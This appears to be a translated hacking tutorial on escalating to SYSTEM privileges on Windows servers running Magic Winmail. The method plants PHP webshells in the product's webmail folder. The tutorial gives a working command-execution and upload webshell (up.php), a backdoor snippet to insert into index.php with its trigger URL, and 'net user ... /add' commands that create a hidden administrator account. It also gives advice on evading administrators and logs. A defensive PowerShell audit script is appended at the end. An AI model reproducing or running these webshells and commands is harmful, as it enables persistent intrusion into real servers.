Use magic winmail to escalate Permissions

Source: Internet
Author: User
Magic Winmail is a good mail server product that many websites like, mainly small and medium ones. However, during a recent penetration test I found that a server running it is in a dangerous position: once an attacker gets a webshell on the box, Magic Winmail gives them a way to escalate permissions.
A server running Magic Winmail opens port 8080 on the system to provide its external webmail service; anyone who has used it knows this. The Magic Winmail server parses PHP scripts.

Figure 1

Inside the Magic Winmail installation folder there is a Server folder, which in turn contains a WebMail folder.

Figure 2

You can find some PHP script files in this folder. Because Magic Winmail parses PHP scripts, it is a good helper for escalating permissions through this weakness. I found this method by accident. I wanted to install a backdoor on this server, but how? The usual methods did not work, so I had to come up with something for port 8080 on the server, and Magic Winmail turned out to be the best place. On the machine I tested, the physical path was D:/magicw~1/Server/webmail: put a PHP script in that folder, whether it is an injection script or an ordinary PHP script, and it just works. lis0 tells you that you can use it with confidence. Will there be no logs? Newbie. When a system is compromised, the administrator usually goes to the system disk, runs MD5 verification and scans for script Trojans; he would never dream that our script is sitting in this folder. lis0 recommends using injection scripts or self-written scripts that antivirus software does not recognize. Which script do I use? lis0 uses an up.php written by Angel with a few things inserted; it is very convenient for uploading a modified script or anything else. What about logs? Of course there are logs. But until now there have not been many network administrators who look at the logs in the Magic Winmail folder, unless they have read this article.

up.php code (relies on register_globals, PHP 4 era: $id, $cmd, $file, $a, $b, $SERVER_NAME and $PHP_SELF are populated straight from the request)
<?
if ($id == "1") {
    system($cmd);          // run the command given in the cmd parameter
    show_source($file);    // print the source of the file given in the file parameter
    copy($a, $b);          // copy file a to b
    unlink($del);          // the variable name is missing in the original listing; $del is a placeholder
}
?>
<?
$fname = $_FILES['myfile']['name'];
$do = copy($_FILES['myfile']['tmp_name'], $fname);   // save the upload next to this script
if ($do) {
    echo "uploaded<p>";
    echo "http://" . $SERVER_NAME . dirname($PHP_SELF) . "/" . $fname;
} else {
    echo "Upload Failed";
}
?>
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post">
<input name="myfile" type="file">
<input value="Submit" type="submit">
</form>
In fact, we can insert the following code into the index.php file of Magic Winmail; it has plenty of functions, plus the weakness lis0 found. This is the perfect backdoor.
<?
if ($id == "1") {
    system($cmd);
    show_source($file);
    copy($a, $b);
    unlink($del);   // variable name missing in the original listing; $del is a placeholder
}
?>
We then use http://www.target.com:8080/index.php?id=1&yy=xx to reach our compromised host. That seems a bit too sneaky :)
Still haven't got to the vulnerability? Enough rambling. Place a PHP script in D:/magicw~1/Server/WebMail
Figure 3

Then net user lis0 lis0 /add & net localgroup administrators lis0 /add. This is the weakness the buddies discovered; if you don't believe it, let the compromised host prove that I am right.

Figure 4

This webshell runs at SYSTEM level, not at your guest level. It is still a webshell, but it gets very different treatment. If you want to play with other things, the up.php file I mentioned above should do the job; just execute it from the script's cute command box.
Can an ASP script be used to escalate permissions in the same way, placed in the Magic Winmail folder?
Let's check whether Magic Winmail can parse both PHP and ASP scripts. Sorry, Magic Winmail cannot parse ASP scripts. Magic Winmail is a PHP world.
How did we analyze the vulnerability? Our lovely network administrator installs Magic Winmail as a system service, so Magic Winmail inherits SYSTEM-level permissions, and since Magic Winmail parses PHP scripts, our cute PHP script runs at SYSTEM level too. In this respect Magic Winmail is a bit like the Chinese-made NetBox.
Let's see whether the analysis is correct. So I uploaded a PHP probe to see what happens.

Figure 5

Oh no, darling.
SYSTEM level & no disabled functions & uploads allowed up to 32 MB & lis0 is happy. I personally think this is the most perfect location for a PHP script backdoor; give full play to your PHP talent. That's about it, I hope it helps everyone's penetration tests.

Solution: lock down the disk where Magic Winmail is installed and restrict access by low-privileged (guest-level) users.
Statement: this method will be a big surprise for many people. Placing a backdoor and escalating permissions may have negative consequences. The test script has been completely deleted. Bored people, please do not read yourselves into this.
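As an added defensive check (not part of the original article), the PowerShell audit below verifies the two conditions the escalation above depends on: the Magic Winmail service running as LocalSystem, and PHP files appearing in the WebMail folder that were not shipped with the product, plus the write permissions that let a low-privileged webshell drop files there. The service-name pattern, the baseline file location and the D:\magicw~1 path are assumptions taken from the article's description.

```powershell
# Added audit script (assumed paths and names; not from the original article).
param(
    [string]$WebmailRoot    = 'D:\magicw~1\Server\webmail',             # path quoted in the article
    [string]$BaselineFile   = 'C:\ProgramData\winmail-php-baseline.csv', # assumed location
    [string]$ServicePattern = '*winmail*'                                # assumed service name
)

# 1. The escalation works because the mail service runs as LocalSystem. Report the account.
Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.Name -like $ServicePattern -or $_.DisplayName -like $ServicePattern } |
    ForEach-Object {
        $flag = if ($_.StartName -match 'LocalSystem') { 'RUNS AS SYSTEM' } else { 'ok' }
        '{0,-30} {1,-25} {2}' -f $_.Name, $_.StartName, $flag
    }

# 2. Hash every PHP file under the WebMail folder and compare with a known-good baseline.
$current = Get-ChildItem -Path $WebmailRoot -Recurse -Filter '*.php' -File |
    Get-FileHash -Algorithm SHA256 |
    Select-Object Path, Hash

if (-not (Test-Path $BaselineFile)) {
    # First run on a clean install: record the shipped scripts for later comparison.
    $current | Export-Csv -Path $BaselineFile -NoTypeInformation
    Write-Output "Baseline written to $BaselineFile ($($current.Count) files)"
    return
}

$baseline = Import-Csv -Path $BaselineFile
# Entries only on the current side are scripts added or modified since the baseline,
# e.g. an up.php dropped next to the product's own index.php.
$suspect = Compare-Object -ReferenceObject $baseline -DifferenceObject $current -Property Path, Hash |
    Where-Object SideIndicator -eq '=>'

foreach ($s in $suspect) {
    $item = Get-Item -LiteralPath $s.Path
    'NEW/CHANGED {0}  modified={1}  owner={2}' -f $s.Path, $item.LastWriteTime, (Get-Acl -LiteralPath $s.Path).Owner
}

# 3. A webshell can only drop files here if a low-privileged identity has write access.
(Get-Acl -LiteralPath $WebmailRoot).Access |
    Where-Object { $_.AccessControlType -eq 'Allow' -and
                   $_.FileSystemRights -match 'Write|Modify|FullControl' -and
                   $_.IdentityReference -match 'Everyone|\\Users|Guest|IIS_IUSRS|Authenticated Users' } |
    Select-Object IdentityReference, FileSystemRights
```

Run it once on a clean install to write the baseline, then schedule it; any service reported as RUNS AS SYSTEM, any NEW/CHANGED line, or any broad write ACE on the folder is a finding to act on.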
